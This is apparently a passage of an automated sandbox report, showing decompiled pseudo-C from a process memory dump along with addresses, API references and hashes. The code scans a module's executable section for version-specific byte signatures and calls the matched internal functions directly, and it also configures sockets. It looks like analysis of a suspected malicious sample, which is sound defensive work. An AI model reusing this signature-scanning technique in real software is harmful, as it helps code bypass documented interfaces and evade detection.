                                                                                    						} else {
                                                                                    							_t188 =  *((intOrPtr*)(_t220 + 0x3c)) + _t220;
                                                                                    							if( *_t188 != 0x4550) {
                                                                                    								goto L91;
                                                                                    							} else {
                                                                                    								_t157 = 0;
                                                                                    								_t113 = ( *(_t188 + 0x14) & 0x0000ffff) + 0x18 + _t188;
                                                                                    								_t189 =  *(_t188 + 6) & 0x0000ffff;
                                                                                    								if(_t189 == 0) {
                                                                                    									goto L91;
                                                                                    								} else {
                                                                                    									while(( *(_t113 + 0x24) & 0x20000000) == 0) {
                                                                                    										_t157 = _t157 + 1;
                                                                                    										_t113 = _t113 + 0x28;
                                                                                    										if(_t157 < _t189) {
                                                                                    											continue;
                                                                                    										} else {
                                                                                    											return E04ED572E(_v8 ^ _t227);
                                                                                    										}
                                                                                    										goto L92;
                                                                                    									}
                                                                                    									_push(_t197);
                                                                                    									_t198 =  *((intOrPtr*)(_t113 + 0x10));
                                                                                    									_v320 = _t198;
                                                                                    									_t191 =  *((intOrPtr*)(_t113 + 0xc)) + _t220;
                                                                                    									if(_t191 == 0 || _t198 == 0) {
                                                                                    										L90:
                                                                                    										goto L91;
                                                                                    									} else {
                                                                                    										_t114 = _v304;
                                                                                    										if(_t114 != 0xa) {
                                                                                    											if(_t114 != 6) {
                                                                                    												goto L90;
                                                                                    											} else {
                                                                                    												_t115 = _v300;
                                                                                    												if(_t115 == 3) {
                                                                                    													goto L35;
                                                                                    												} else {
                                                                                    													if(_t115 != 2) {
                                                                                    														if(_t115 != 1) {
                                                                                    															goto L90;
                                                                                    														} else {
                                                                                    															_t223 = 0;
                                                                                    															_v20 = 0x8b55ff8b;
                                                                                    															_v16 = 0x56ec;
                                                                                    															_t203 = _t198 + 0xfffffff9;
                                                                                    															_v14 = 0x68;
                                                                                    															_v312 = 0x38e05d89;
                                                                                    															do {
                                                                                    																_t161 = 0;
                                                                                    																while( *((intOrPtr*)(_t161 + _t223 + _t191)) ==  *((intOrPtr*)(_t227 + _t161 - 0x10))) {
                                                                                    																	_t161 = _t161 + 1;
                                                                                    																	if(_t161 < 7) {
                                                                                    																		continue;
                                                                                    																	}
                                                                                    																	break;
                                                                                    																}
                                                                                    																if(_t161 == 7) {
                                                                                    																	_t153 = _t223 + _t191;
                                                                                    																	if(_t153 == 0) {
                                                                                    																		goto L90;
                                                                                    																	} else {
                                                                                    																		_t224 = 0;
                                                                                    																		_t205 = _v320 + 0xfffffffc;
                                                                                    																		do {
                                                                                    																			_t162 = 0;
                                                                                    																			while( *((intOrPtr*)(_t162 + _t224 + _t191)) ==  *((intOrPtr*)(_t227 + _t162 - 0x134))) {
                                                                                    																				_t162 = _t162 + 1;
                                                                                    																				if(_t162 < 4) {
                                                                                    																					continue;
                                                                                    																				}
                                                                                    																				break;
                                                                                    																			}
                                                                                    																			if(_t162 == 4) {
                                                                                    																				goto L76;
                                                                                    																			} else {
                                                                                    																				goto L74;
                                                                                    																			}
                                                                                    																			goto L92;
                                                                                    																			L74:
                                                                                    																			_t224 = _t224 + 1;
                                                                                    																		} while (_t224 <= _t205);
                                                                                    																		return E04ED572E(_v8 ^ _t227);
                                                                                    																	}
                                                                                    																} else {
                                                                                    																	goto L66;
                                                                                    																}
                                                                                    																goto L92;
                                                                                    																L66:
                                                                                    																_t223 = _t223 + 1;
                                                                                    															} while (_t223 <= _t203);
                                                                                    															return E04ED572E(_v8 ^ _t227);
                                                                                    														}
                                                                                    													} else {
                                                                                    														_t225 = 0;
                                                                                    														_v20 = 0x8b55ff8b;
                                                                                    														_v16 = 0x56ec;
                                                                                    														_t209 = _t198 + 0xfffffff9;
                                                                                    														_v14 = 0x68;
                                                                                    														_v312 = 0x38e05d89;
                                                                                    														do {
                                                                                    															_t169 = 0;
                                                                                    															asm("o16 nop [eax+eax]");
                                                                                    															while( *((intOrPtr*)(_t169 + _t225 + _t191)) ==  *((intOrPtr*)(_t227 + _t169 - 0x10))) {
                                                                                    																_t169 = _t169 + 1;
                                                                                    																if(_t169 < 7) {
                                                                                    																	continue;
                                                                                    																}
                                                                                    																break;
                                                                                    															}
                                                                                    															if(_t169 == 7) {
                                                                                    																_t153 = _t225 + _t191;
                                                                                    																if(_t153 == 0) {
                                                                                    																	goto L90;
                                                                                    																} else {
                                                                                    																	_t224 = 0;
                                                                                    																	_t211 = _v320 + 0xfffffffc;
                                                                                    																	do {
                                                                                    																		_t170 = 0;
                                                                                    																		asm("o16 nop [eax+eax]");
                                                                                    																		while( *((intOrPtr*)(_t170 + _t224 + _t191)) ==  *((intOrPtr*)(_t227 + _t170 - 0x134))) {
                                                                                    																			_t170 = _t170 + 1;
                                                                                    																			if(_t170 < 4) {
                                                                                    																				continue;
                                                                                    																			}
                                                                                    																			break;
                                                                                    																		}
                                                                                    																		if(_t170 == 4) {
                                                                                    																			L76:
                                                                                    																			_t125 =  *((intOrPtr*)(_t224 + _t191 + 0x1b));
                                                                                    																			if( *((intOrPtr*)(_t224 + _t191 + 0x1b)) == 0) {
                                                                                    																				goto L90;
                                                                                    																			} else {
                                                                                    																				 *_t153(_v324,  *((intOrPtr*)(_v316 + 0x50)));
                                                                                    																				return E04ED572E(_v8 ^ _t227, _t125);
                                                                                    																			}
                                                                                    																		} else {
                                                                                    																			goto L58;
                                                                                    																		}
                                                                                    																		goto L92;
                                                                                    																		L58:
                                                                                    																		_t224 = _t224 + 1;
                                                                                    																	} while (_t224 <= _t211);
                                                                                    																	return E04ED572E(_v8 ^ _t227);
                                                                                    																}
                                                                                    															} else {
                                                                                    																goto L50;
                                                                                    															}
                                                                                    															goto L92;
                                                                                    															L50:
                                                                                    															_t225 = _t225 + 1;
                                                                                    														} while (_t225 <= _t209);
                                                                                    														return E04ED572E(_v8 ^ _t227);
                                                                                    													}
                                                                                    												}
                                                                                    											}
                                                                                    										} else {
                                                                                    											if(_v300 != 0) {
                                                                                    												goto L90;
                                                                                    											} else {
                                                                                    												_t175 = _v296;
                                                                                    												if(_t175 < 0x3fab) {
                                                                                    													if(_t175 - 0x3ad7 > 0x4d3) {
                                                                                    														if(_t175 < 0x3ad7) {
                                                                                    															L35:
                                                                                    															_t150 = 0;
                                                                                    															_v20 = 0x8b575653;
                                                                                    															_t221 = 0;
                                                                                    															_v16 = 0x50f98bda;
                                                                                    															_v32 = 0x89f4458d;
                                                                                    															_t200 = _t198 + 0xfffffff8;
                                                                                    															_v28 = 0x8d50f855;
                                                                                    															_v24 = 0xfc55;
                                                                                    															do {
                                                                                    																_t158 = 0;
                                                                                    																while( *((intOrPtr*)(_t158 + _t221 + _t191)) ==  *((intOrPtr*)(_t227 + _t158 - 0x10))) {
                                                                                    																	_t158 = _t158 + 1;
                                                                                    																	if(_t158 < 8) {
                                                                                    																		continue;
                                                                                    																	}
                                                                                    																	break;
                                                                                    																}
                                                                                    																if(_t158 == 8) {
                                                                                    																	_t150 = _t191 - 0xb + _t221;
                                                                                    																} else {
                                                                                    																	goto L40;
                                                                                    																}
                                                                                    																L79:
                                                                                    																if(_t150 != 0) {
                                                                                    																	L89:
                                                                                    																	 *_t150();
                                                                                    																} else {
                                                                                    																	_t222 = 0;
                                                                                    																	_t202 = _v320 + 0xfffffff6;
                                                                                    																	do {
                                                                                    																		_t160 = 0;
                                                                                    																		while( *((intOrPtr*)(_t160 + _t222 + _t191)) ==  *((intOrPtr*)(_t227 + _t160 - 0x1c))) {
                                                                                    																			_t160 = _t160 + 1;
                                                                                    																			if(_t160 < 0xa) {
                                                                                    																				continue;
                                                                                    																			}
                                                                                    																			break;
                                                                                    																		}
                                                                                    																		if(_t160 == 0xa) {
                                                                                    																			_t150 = _t191 - 0xb + _t222;
                                                                                    																		} else {
                                                                                    																			goto L85;
                                                                                    																		}
                                                                                    																		L88:
                                                                                    																		if(_t150 != 0) {
                                                                                    																			goto L89;
                                                                                    																		}
                                                                                    																		goto L90;
                                                                                    																		L85:
                                                                                    																		_t222 = _t222 + 1;
                                                                                    																	} while (_t222 <= _t202);
                                                                                    																	goto L88;
                                                                                    																}
                                                                                    																goto L90;
                                                                                    																L40:
                                                                                    																_t221 = _t221 + 1;
                                                                                    															} while (_t221 <= _t200);
                                                                                    															goto L79;
                                                                                    														}
                                                                                    														goto L90;
                                                                                    													} else {
                                                                                    														_t226 = 0;
                                                                                    														_v20 = 0x89f0458d;
                                                                                    														_v16 = 0x8d50f855;
                                                                                    														_t214 = _t198 + 0xfffffff6;
                                                                                    														_v12 = 0xf455;
                                                                                    														do {
                                                                                    															_t176 = 0;
                                                                                    															while( *((intOrPtr*)(_t176 + _t226 + _t191)) ==  *((intOrPtr*)(_t227 + _t176 - 0x10))) {
                                                                                    																_t176 = _t176 + 1;
                                                                                    																if(_t176 < 0xa) {
                                                                                    																	continue;
                                                                                    																}
                                                                                    																break;
                                                                                    															}
                                                                                    															if(_t176 == 0xa) {
                                                                                    																_t139 = _t191 - 0xb;
                                                                                    																goto L32;
                                                                                    															} else {
                                                                                    																goto L29;
                                                                                    															}
                                                                                    															goto L92;
                                                                                    															L29:
                                                                                    															_t226 = _t226 + 1;
                                                                                    														} while (_t226 <= _t214);
                                                                                    														return E04ED572E(_v8 ^ _t227);
                                                                                    													}
                                                                                    												} else {
                                                                                    													_t226 = 0;
                                                                                    													_v20 = 0x8d575653;
                                                                                    													_v16 = 0xfa8bf845;
                                                                                    													_t217 = _t198 + 0xfffffff8;
                                                                                    													do {
                                                                                    														_t182 = 0;
                                                                                    														while( *((intOrPtr*)(_t182 + _t226 + _t191)) ==  *((intOrPtr*)(_t227 + _t182 - 0x10))) {
                                                                                    															_t182 = _t182 + 1;
                                                                                    															if(_t182 < 8) {
                                                                                    																continue;
                                                                                    															}
                                                                                    															break;
                                                                                    														}
                                                                                    														if(_t182 == 8) {
                                                                                    															_t139 = _t191 - 8;
                                                                                    															L32:
                                                                                    															_t140 = _t139 + _t226;
                                                                                    															if(_t140 == 0) {
                                                                                    																goto L90;
                                                                                    															} else {
                                                                                    																 *_t140();
                                                                                    																return E04ED572E(_v8 ^ _t227);
                                                                                    															}
                                                                                    														} else {
                                                                                    															goto L20;
                                                                                    														}
                                                                                    														goto L92;
                                                                                    														L20:
                                                                                    														_t226 = _t226 + 1;
                                                                                    													} while (_t226 <= _t217);
                                                                                    													return E04ED572E(_v8 ^ _t227);
                                                                                    												}
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				L92:
                                                                                    			}
                                                                                    0x04ebc540
                                                                                    0x04ebc549
                                                                                    0x04ebc550
                                                                                    0x04ebc560
                                                                                    0x04ebc566
                                                                                    0x04ebc572
                                                                                    0x04ebc576
                                                                                    0x04ebc97e
                                                                                    0x04ebc98d
                                                                                    0x04ebc57c
                                                                                    0x04ebc58a
                                                                                    0x04ebc598
                                                                                    0x04ebc5a0
                                                                                    0x00000000
                                                                                    0x04ebc5a6
                                                                                    0x04ebc5ac
                                                                                    0x04ebc5b1
                                                                                    0x00000000
                                                                                    0x04ebc5c5
                                                                                    0x04ebc5c8
                                                                                    0x04ebc5d0
                                                                                    0x00000000
                                                                                    0x04ebc5d6
                                                                                    0x04ebc5da
                                                                                    0x04ebc5df
                                                                                    0x04ebc5e1
                                                                                    0x04ebc5e7
                                                                                    0x00000000
                                                                                    0x04ebc5f0
                                                                                    0x04ebc5f0
                                                                                    0x04ebc5f9
                                                                                    0x04ebc5fa
                                                                                    0x04ebc5ff
                                                                                    0x00000000
                                                                                    0x04ebc603
                                                                                    0x04ebc610
                                                                                    0x04ebc610
                                                                                    0x00000000
                                                                                    0x04ebc5ff
                                                                                    0x04ebc616
                                                                                    0x04ebc617
                                                                                    0x04ebc61a
                                                                                    0x04ebc620
                                                                                    0x04ebc622
                                                                                    0x04ebc97d
                                                                                    0x00000000
                                                                                    0x04ebc630
                                                                                    0x04ebc630
                                                                                    0x04ebc639
                                                                                    0x04ebc78b
                                                                                    0x00000000
                                                                                    0x04ebc791
                                                                                    0x04ebc791
                                                                                    0x04ebc79a
                                                                                    0x00000000
                                                                                    0x04ebc79c
                                                                                    0x04ebc79f
                                                                                    0x04ebc859
                                                                                    0x00000000
                                                                                    0x04ebc85f
                                                                                    0x04ebc85f
                                                                                    0x04ebc861
                                                                                    0x04ebc868
                                                                                    0x04ebc86e
                                                                                    0x04ebc871
                                                                                    0x04ebc875
                                                                                    0x04ebc880
                                                                                    0x04ebc880
                                                                                    0x04ebc882
                                                                                    0x04ebc88e
                                                                                    0x04ebc892
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc892
                                                                                    0x04ebc897
                                                                                    0x04ebc8b1
                                                                                    0x04ebc8b6
                                                                                    0x00000000
                                                                                    0x04ebc8bc
                                                                                    0x04ebc8c2
                                                                                    0x04ebc8c4
                                                                                    0x04ebc8c7
                                                                                    0x04ebc8c7
                                                                                    0x04ebc8d0
                                                                                    0x04ebc8df
                                                                                    0x04ebc8e3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc8e3
                                                                                    0x04ebc8e8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc8ea
                                                                                    0x04ebc8ea
                                                                                    0x04ebc8eb
                                                                                    0x04ebc8ff
                                                                                    0x04ebc8ff
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc899
                                                                                    0x04ebc899
                                                                                    0x04ebc89a
                                                                                    0x04ebc8ae
                                                                                    0x04ebc8ae
                                                                                    0x04ebc7a5
                                                                                    0x04ebc7a5
                                                                                    0x04ebc7a7
                                                                                    0x04ebc7ae
                                                                                    0x04ebc7b4
                                                                                    0x04ebc7b7
                                                                                    0x04ebc7bb
                                                                                    0x04ebc7c5
                                                                                    0x04ebc7c5
                                                                                    0x04ebc7c7
                                                                                    0x04ebc7d0
                                                                                    0x04ebc7dc
                                                                                    0x04ebc7e0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc7e0
                                                                                    0x04ebc7e5
                                                                                    0x04ebc7ff
                                                                                    0x04ebc804
                                                                                    0x00000000
                                                                                    0x04ebc80a
                                                                                    0x04ebc810
                                                                                    0x04ebc812
                                                                                    0x04ebc815
                                                                                    0x04ebc815
                                                                                    0x04ebc817
                                                                                    0x04ebc820
                                                                                    0x04ebc82f
                                                                                    0x04ebc833
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc833
                                                                                    0x04ebc838
                                                                                    0x04ebc902
                                                                                    0x04ebc902
                                                                                    0x04ebc908
                                                                                    0x00000000
                                                                                    0x04ebc90a
                                                                                    0x04ebc91a
                                                                                    0x04ebc92c
                                                                                    0x04ebc92c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc83e
                                                                                    0x04ebc83e
                                                                                    0x04ebc83f
                                                                                    0x04ebc853
                                                                                    0x04ebc853
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc7e7
                                                                                    0x04ebc7e7
                                                                                    0x04ebc7e8
                                                                                    0x04ebc7fc
                                                                                    0x04ebc7fc
                                                                                    0x04ebc79f
                                                                                    0x04ebc79a
                                                                                    0x04ebc63f
                                                                                    0x04ebc646
                                                                                    0x00000000
                                                                                    0x04ebc64c
                                                                                    0x04ebc64c
                                                                                    0x04ebc658
                                                                                    0x04ebc6b1
                                                                                    0x04ebc732
                                                                                    0x04ebc738
                                                                                    0x04ebc738
                                                                                    0x04ebc73a
                                                                                    0x04ebc741
                                                                                    0x04ebc743
                                                                                    0x04ebc74a
                                                                                    0x04ebc751
                                                                                    0x04ebc754
                                                                                    0x04ebc75b
                                                                                    0x04ebc761
                                                                                    0x04ebc761
                                                                                    0x04ebc763
                                                                                    0x04ebc76f
                                                                                    0x04ebc773
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc773
                                                                                    0x04ebc778
                                                                                    0x04ebc932
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc934
                                                                                    0x04ebc936
                                                                                    0x04ebc96c
                                                                                    0x04ebc97b
                                                                                    0x04ebc938
                                                                                    0x04ebc93e
                                                                                    0x04ebc940
                                                                                    0x04ebc943
                                                                                    0x04ebc943
                                                                                    0x04ebc945
                                                                                    0x04ebc951
                                                                                    0x04ebc955
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc955
                                                                                    0x04ebc95a
                                                                                    0x04ebc966
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc968
                                                                                    0x04ebc96a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc95c
                                                                                    0x04ebc95c
                                                                                    0x04ebc95d
                                                                                    0x00000000
                                                                                    0x04ebc961
                                                                                    0x00000000
                                                                                    0x04ebc77e
                                                                                    0x04ebc77e
                                                                                    0x04ebc77f
                                                                                    0x00000000
                                                                                    0x04ebc783
                                                                                    Graph node addresses (rendered graph not preserved in the text export):
                                                                                    0x00000000 0x04ebc6b3 0x04ebc6b3 0x04ebc6b5 0x04ebc6bc 0x04ebc6c3 0x04ebc6c6 0x04ebc6d0 0x04ebc6d0 0x04ebc6d2
                                                                                    0x04ebc6de 0x04ebc6e2 0x00000000 0x00000000 0x00000000 0x04ebc6e2 0x04ebc6e7 0x04ebc701 0x00000000 0x00000000
                                                                                    0x00000000 0x00000000 0x00000000 0x04ebc6e9 0x04ebc6e9 0x04ebc6ea 0x04ebc6fe 0x04ebc6fe 0x04ebc65a 0x04ebc65a
                                                                                    0x04ebc65c 0x04ebc663 0x04ebc66a 0x04ebc670 0x04ebc670 0x04ebc672 0x04ebc67e 0x04ebc682 0x00000000 0x00000000
                                                                                    0x00000000 0x04ebc682 0x04ebc687 0x04ebc6a1 0x04ebc704 0x04ebc704 0x04ebc706 0x00000000 0x04ebc70c 0x04ebc717
                                                                                    0x04ebc729 0x04ebc729 0x00000000 0x00000000 0x00000000 0x00000000 0x04ebc689 0x04ebc689 0x04ebc68a 0x04ebc69e
                                                                                    0x04ebc69e 0x04ebc658 0x04ebc646 0x04ebc639 0x04ebc622 0x04ebc5e7 0x04ebc5d0 0x04ebc5b1 0x04ebc5a0 0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(ntdll,00000000,74E043E0), ref: 04EBC56C
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 04EBC598
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: RtlGetVersion$h$ntdll$V
                                                                                    • API String ID: 1646373207-3705289206
                                                                                    • Opcode ID: e5c2537e49d4288b75c2e0395e5845e89a7a69b4747da1b63fa626746d86ec4e
                                                                                    • Instruction ID: 95c041ecf7b59f62a1d61270ed3f001924bd45602a200bb0aa38c156f60d63d9
                                                                                    • Opcode Fuzzy Hash: e5c2537e49d4288b75c2e0395e5845e89a7a69b4747da1b63fa626746d86ec4e
                                                                                    • Instruction Fuzzy Hash: C8C11832A091188BDB358F68D4906FEF7A0FF46718F7421AEC9D65B551DB31A982CBC0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 28%
                                                                                    			E04ED39E0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, long _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int* _a20, signed short* _a24) {
                                                                                    				signed int _v8;
                                                                                    				signed int _v12;
                                                                                    				signed int _v16;
                                                                                    				signed int _v20;
                                                                                    				signed int _v24;
                                                                                    				signed int _v28;
                                                                                    				intOrPtr* _v32;
                                                                                    				intOrPtr* _v36;
                                                                                    				signed short _v50;
                                                                                    				char _v52;
                                                                                    				long _v56;
                                                                                    				signed int* _v60;
                                                                                    				intOrPtr _v64;
                                                                                    				void* _v76;
                                                                                    				intOrPtr* _v116;
                                                                                    				intOrPtr _v124;
                                                                                    				intOrPtr _v128;
                                                                                    				intOrPtr _v136;
                                                                                    				signed int _v148;
                                                                                    				intOrPtr _v152;
                                                                                    				intOrPtr _v156;
                                                                                    				long _v160;
                                                                                    				signed int _v164;
                                                                                    				intOrPtr _v168;
                                                                                    				signed int _v184;
                                                                                    				char _v188;
                                                                                    				intOrPtr _v192;
                                                                                    				intOrPtr _v196;
                                                                                    				signed int _v208;
                                                                                    				intOrPtr _v212;
                                                                                    				char _v216;
                                                                                    				signed int _t124;
                                                                                    				signed short _t127;
                                                                                    				void* _t128;
                                                                                    				signed int _t129;
                                                                                    				signed int _t130;
                                                                                    				signed int* _t131;
                                                                                    				intOrPtr _t132;
                                                                                    				signed int* _t135;
                                                                                    				void* _t137;
                                                                                    				signed int _t139;
                                                                                    				void* _t141;
                                                                                    				signed int _t144;
                                                                                    				intOrPtr _t154;
                                                                                    				signed int _t156;
                                                                                    				long _t160;
                                                                                    				long _t163;
                                                                                    				signed int _t165;
                                                                                    				signed int _t174;
                                                                                    				void* _t175;
                                                                                    				signed int _t176;
                                                                                    				long _t177;
                                                                                    				signed int _t180;
                                                                                    				signed int _t185;
                                                                                    				signed int _t187;
                                                                                    				long _t188;
                                                                                    				signed short _t191;
                                                                                    				signed int* _t195;
                                                                                    				signed int _t206;
                                                                                    				signed int _t209;
                                                                                    				signed int* _t210;
                                                                                    				signed int _t211;
                                                                                    				intOrPtr _t213;
                                                                                    				void* _t214;
                                                                                    				long _t222;
                                                                                    				signed int _t223;
                                                                                    				signed int _t225;
                                                                                    				intOrPtr* _t228;
                                                                                    				signed int _t229;
                                                                                    				signed int _t243;
                                                                                    				intOrPtr _t250;
                                                                                    				signed int _t252;
                                                                                    				signed int _t257;
                                                                                    				signed int _t261;
                                                                                    				signed short* _t265;
                                                                                    				intOrPtr* _t266;
                                                                                    				signed int _t268;
                                                                                    				signed int _t269;
                                                                                    				long _t270;
                                                                                    				intOrPtr _t277;
                                                                                    				signed short* _t278;
                                                                                    				signed int _t279;
                                                                                    				struct _CRITICAL_SECTION* _t281;
                                                                                    				intOrPtr _t283;
                                                                                    				intOrPtr _t285;
                                                                                    				signed int _t291;
                                                                                    				signed int _t292;
                                                                                    				signed int _t293;
                                                                                    				signed int _t294;
                                                                                    				void* _t295;
                                                                                    				signed int _t296;
                                                                                    				signed int _t297;
                                                                                    
                                                                                    				_t124 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t124 ^ _t291;
                                                                                    				_push(__ebx);
                                                                                    				_t209 = _a12;
                                                                                    				_push(__esi);
                                                                                    				_t277 = __ecx;
                                                                                    				_v56 = _a4;
                                                                                    				_v60 = _a20;
                                                                                    				_push(__edi);
                                                                                    				_t265 = _a24;
                                                                                    				_v64 = __ecx;
                                                                                    				_t127 = E04ECCC60(_a4, __ecx);
                                                                                    				_t250 = _a8;
                                                                                    				_t222 = _v56;
                                                                                    				 *_t265 = _t127;
                                                                                    				_push(_t265);
                                                                                    				if(_t127 == 0) {
                                                                                    					_t128 = E04ECCDA0(_t209, _t222, _t250, _t265, __ecx, __eflags);
                                                                                    				} else {
                                                                                    					_t128 = E04ECCD10(_t209, _t250, _t265, __ecx);
                                                                                    				}
                                                                                    				_t296 = _t295 + 4;
                                                                                    				if(_t128 != 0) {
                                                                                    					_t278 = _t277 + 0x5c;
                                                                                    					__eflags = _t209;
                                                                                    					if(_t209 == 0) {
                                                                                    						L9:
                                                                                    						_t129 =  *_t278 & 0x0000ffff;
                                                                                    						__eflags = _t129 - 2;
                                                                                    						if(_t129 == 2) {
                                                                                    							L14:
                                                                                    							_v56 = 1;
                                                                                    							__eflags = _t129 -  *_t265;
                                                                                    							if(_t129 ==  *_t265) {
                                                                                    								goto L12;
                                                                                    							} else {
                                                                                    								goto L35;
                                                                                    							}
                                                                                    						} else {
                                                                                    							__eflags = _t129 - 0x17;
                                                                                    							if(_t129 == 0x17) {
                                                                                    								goto L14;
                                                                                    							} else {
                                                                                    								_v56 = 0;
                                                                                    								L12:
                                                                                    								_t130 =  *_t265 & 0x0000ffff;
                                                                                    								_t210 = 0;
                                                                                    								__imp__#23(_t130, 1, 6);
                                                                                    								_t223 = _t130;
                                                                                    								_t131 = _v60;
                                                                                    								 *_t131 = _t223;
                                                                                    								__eflags = _t223 - 0xffffffff;
                                                                                    								if(_t223 != 0xffffffff) {
                                                                                    									_t132 = _v64;
                                                                                    									__eflags =  *(_t132 + 0x30);
                                                                                    									if( *(_t132 + 0x30) == 0) {
                                                                                    										L19:
                                                                                    										_t252 = 0;
                                                                                    										__eflags = 0;
                                                                                    									} else {
                                                                                    										__eflags =  *(_t132 + 0x34);
                                                                                    										if( *(_t132 + 0x34) <= 0) {
                                                                                    											goto L19;
                                                                                    										} else {
                                                                                    											_t252 = 1;
                                                                                    										}
                                                                                    									}
                                                                                    									_v20 = _t252;
                                                                                    									_v12 =  *(_t132 + 0x34);
                                                                                    									_t135 =  &_v20;
                                                                                    									_v16 =  *(_t132 + 0x30);
                                                                                    									__imp__WSAIoctl(_t223, 0x98000004, _t135, 0xc, 0, 0,  &_v24, 0, 0);
                                                                                    									__eflags = _t135 - 0xffffffff;
                                                                                    									if(_t135 != 0xffffffff) {
                                                                                    										L23:
                                                                                    										_t223 =  *_v60;
                                                                                    										_t137 = E04ECD0D0(_t210, _t223,  *((intOrPtr*)(_v64 + 4)), _t265, _t278);
                                                                                    										__eflags = _t137 - 0xffffffff;
                                                                                    										if(_t137 == 0xffffffff) {
                                                                                    											goto L37;
                                                                                    										} else {
                                                                                    											_t243 = _a16;
                                                                                    											__eflags = _t243;
                                                                                    											if(_t243 != 0) {
                                                                                    												__eflags = _v56 - _t210;
                                                                                    												if(_v56 == _t210) {
                                                                                    													__eflags =  *_t265 - 2;
                                                                                    													_t278 =  !=  ? 0x4f056e0 : 0x4f056c4;
                                                                                    												}
                                                                                    												asm("movups xmm0, [esi]");
                                                                                    												_t30 =  &(_t278[0xc]); // 0x0
                                                                                    												_t191 =  *_t30;
                                                                                    												asm("movups [ebp-0x30], xmm0");
                                                                                    												_v28 = _t191;
                                                                                    												asm("movq xmm0, [esi+0x10]");
                                                                                    												asm("movq [ebp-0x20], xmm0");
                                                                                    												__imp__#9(_t243);
                                                                                    												__eflags = _v52 - 2;
                                                                                    												_v50 = _t191;
                                                                                    												_t193 =  ==  ? 0x10 : 0x1c;
                                                                                    												_push( ==  ? 0x10 : 0x1c);
                                                                                    												_push( &_v52);
                                                                                    											} else {
                                                                                    												__eflags = _v56 - _t210;
                                                                                    												if(_v56 == _t210) {
                                                                                    													__eflags =  *_t265 - 2;
                                                                                    													_t278 =  !=  ? 0x4f056e0 : 0x4f056c4;
                                                                                    												}
                                                                                    												__eflags =  *_t278 - 2;
                                                                                    												_t200 =  !=  ? 0x1c : 0x10;
                                                                                    												_push( !=  ? 0x1c : 0x10);
                                                                                    												_push(_t278);
                                                                                    											}
                                                                                    											_t195 = _v60;
                                                                                    											__imp__#2( *_t195);
                                                                                    											__eflags = _t195 - 0xffffffff;
                                                                                    											if(_t195 == 0xffffffff) {
                                                                                    												_t131 =  *__imp__#111();
                                                                                    												goto L33;
                                                                                    											}
                                                                                    											goto L34;
                                                                                    										}
                                                                                    									} else {
                                                                                    										__imp__#111();
                                                                                    										__eflags = _t135 - 0x2733;
                                                                                    										if(_t135 == 0x2733) {
                                                                                    											goto L23;
                                                                                    										} else {
                                                                                    											__eflags = _t135 - 0xffffffff;
                                                                                    											if(_t135 == 0xffffffff) {
                                                                                    												_push(0x80004005);
                                                                                    												E04EB7AB0();
                                                                                    												L37:
                                                                                    												_push(0x80004005);
                                                                                    												E04EB7AB0();
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												asm("int3");
                                                                                    												_push(_t291);
                                                                                    												_t292 = _t296;
                                                                                    												_push(_t210);
                                                                                    												_push(_t278);
                                                                                    												_t211 = _t223;
                                                                                    												_push(_t265);
                                                                                    												_t266 = _v116;
                                                                                    												_t279 = _t211 + 0x178;
                                                                                    												_t139 = E04ED4F30(_t279, _t223, _t266);
                                                                                    												__eflags = _t139;
                                                                                    												if(_t139 != 0) {
                                                                                    													SetLastError(0);
                                                                                    													_t225 = _t211;
                                                                                    													_t141 =  *((intOrPtr*)( *_t211 + 0xd8))( *_t266, _a4);
                                                                                    													__eflags = _t141 - 2;
                                                                                    													if(_t141 != 2) {
                                                                                    														__eflags = 0;
                                                                                    														return 0;
                                                                                    													} else {
                                                                                    														_t213 =  *_t266;
                                                                                    														_t268 =  *(_t279 + 4);
                                                                                    														__eflags = _t268;
                                                                                    														if(_t268 == 0) {
                                                                                    															L47:
                                                                                    															_push(0x80004005);
                                                                                    															E04EB7AB0();
                                                                                    															asm("int3");
                                                                                    															asm("int3");
                                                                                    															asm("int3");
                                                                                    															asm("int3");
                                                                                    															asm("int3");
                                                                                    															asm("int3");
                                                                                    															asm("int3");
                                                                                    															asm("int3");
                                                                                    															asm("int3");
                                                                                    															asm("int3");
                                                                                    															asm("int3");
                                                                                    															asm("int3");
                                                                                    															asm("int3");
                                                                                    															asm("int3");
                                                                                    															_push(_t292);
                                                                                    															_t293 = _t296;
                                                                                    															_t297 = _t296 - 0x18;
                                                                                    															_t144 =  *0x4f03008; // 0x3d21fb31
